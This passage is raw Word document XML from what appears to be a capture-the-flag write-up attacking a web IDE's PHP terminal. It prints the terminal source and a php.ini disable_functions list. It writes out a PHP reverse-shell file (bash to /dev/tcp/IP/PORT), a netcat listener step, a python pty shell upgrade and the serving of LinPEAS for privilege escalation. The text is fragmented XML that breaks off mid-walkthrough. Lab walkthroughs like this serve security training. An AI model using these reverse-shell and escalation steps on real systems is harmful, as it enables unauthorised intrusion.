    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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6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Replace text editors with cat</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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$editors = array("vim", "vi", "nano");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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$str = preg_replace("/^(".join("|", $editors).")/", "cat", trim($str));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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Handle blocked commands</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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$blocked = explode(",", BLOCKED);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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(in_array($command_parts[0], $blocked)) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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$str = "echo ERROR: Command not allowed";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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6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Update exec command</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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return $str . " 2&gt;&amp;1";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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6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6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Change Directory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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6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public function changeDir($dir) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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chdir($dir);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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Store new directory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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$_SESSION["activeDir"][$_SESSION["project"]] = exec("pwd");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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7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7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7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Processing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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//////////////////////////////////////////////////////////////////////////////80</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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$activeUser = SESSION("user");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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$command = POST("command");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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(strtolower($command === "exit")) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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$_SESSION["term_auth"] = false;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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 = "[EXIT]";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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else if (!isset($_SESSION["term_auth"]) || $_SESSION["term_auth"] !== true) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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if ($command === PASSWORD) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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$_SESSION["term_auth"] = true;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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 = "[AUTHENTICATED]";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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else {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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 = "Enter Password:";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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 else {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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$Terminal = new Terminal();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000086">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 = "";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000087">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$command = explode("&amp;&amp;", $command);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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foreach ($command as $c) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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 .= $Terminal-&gt;process($c);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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8C">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$output = array(</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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"data" =&gt; htmlentities($output),</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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"dir" =&gt; htmlentities(exec("pwd")),</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008F">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"prompt" =&gt; "&lt;span class=\"user\"&gt;$activeUser&lt;/span&gt;:&lt;span class=\"path\"&gt;" . exec("pwd") . "&lt;/span&gt;$ "</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000090">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t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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Common::send("success", $output);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000093">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94">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId14">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://t9007105134.p.clickup-attachments.com/t9007105134/34323d2f-7458-43ae-8cdd-f5921af9e7e1/cut.mp4</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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the file, </w:t>
      </w:r>
      <w:hyperlink r:id="rId15">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://172.31.30.153/workspace/notadmin/terminal.php</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">  we see that it executed the command → </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pwd</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96">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="188038"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="188038"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="4368800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="53"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943600" cy="43688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As we can see, the PHP function being used is</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exec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9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create a file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shell.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> that will contain our reverse shell:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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&lt;?php exec("bash -c 'bash -i &gt;&amp; /dev/tcp/IP/PORT 0&gt;&amp;1'"); ?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009A">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5321300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="63"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5943600" cy="53213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Press Ctrl+S to save the file in the IDE. Then, we will use Netcat to listen on a port to receive our reverse connection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="5143500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="55" name="image8.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image8.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="5143500"/>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receive the connection 😀</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009E">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c2rjhsw8bpt8" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="4381500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="68"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9436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9F">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8bmp4shh96w" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Shell tty</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A0">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Upgrading a simple shell to fully interactive TTYs:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A1">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-c "import pty;pty.spawn('/bin/bash')"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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Ctrl+Z</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A3">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stty raw -echo;fg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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Enter</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A5">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export TERM=xterm</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A6">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7">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737100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="58"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943600" cy="47371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By reviewing the</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">php.ini</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file, we see that several PHP functions are disabled, except for </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">exec</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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disable_functions =</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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system,shell_exec,mail,passthru,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source,pcntl_exec,eval,mb_send_mail,imap_open,phpinfo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AB">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AC">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648200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="60" name="image20.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image20.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="4648200"/>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Navigating to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/www</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we find our second flag.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AE">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06900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="70"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5943600" cy="44069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pStyle w:val="Heading1"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="46"/>
          <w:szCs w:val="46"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.3742axnczg7x" w:id="9"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="46"/>
          <w:szCs w:val="46"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B0">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId23">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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LinPEAS is a script that searches for possible privilege escalation paths on Linux / Unix / MacOS hosts. The checks are explained at:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B2">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="1155cc"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId24">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:br w:type="textWrapping"/>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId25">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://book.hacktricks.xyz/linux-unix/privilege-escalation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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start a Python server on our machine to send LinPEAS to the compromised server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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python -m SimpleHTTPServer 80</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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857875" cy="4686300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="69" name="image21.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image21.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26"/>
